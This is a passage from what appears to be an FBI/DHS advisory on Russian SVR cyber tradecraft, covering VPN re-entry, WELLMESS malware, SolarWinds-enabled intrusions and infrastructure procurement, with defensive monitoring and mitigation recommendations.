Following initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.

Recommendations

To defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:

  • Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP.
  • Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
  • Require use of multi-factor authentication to access internal systems.
  • Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate into enterprise monitoring tools.

WELLMESS Malware

In 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI’s investigation revealed that following initial compromise of a network—normally through an unpatched, publicly-known vulnerability—the actors deployed WELLMESS. Once on the network, the actors targeted each organization’s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion have been previously released and are referenced in the ‘Resources’ section of this document.

Tradecraft Similarities of SolarWinds-enabled Intrusions

During the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR’s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR’s historic tradecraft.

The FBI’s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.

Recommendations

Although defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:

  • Auditing log files to identify attempts to access privileged certificates and creation of fake identify providers.
  • Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.
  • Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
  • Using available public resources to identify credential abuse within cloud environments.
  • Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.

While few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly “zero trust” architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.

General Tradecraft Observations

SVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.

The FBI also notes SVR cyber operators have used open source or commercially available tools continuously, including Mimikatz—an open source credential-dumping too—and Cobalt Strike—a commercially available exploitation tool.

Mitigations

The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.

Resources

Revisions

  • April 26, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.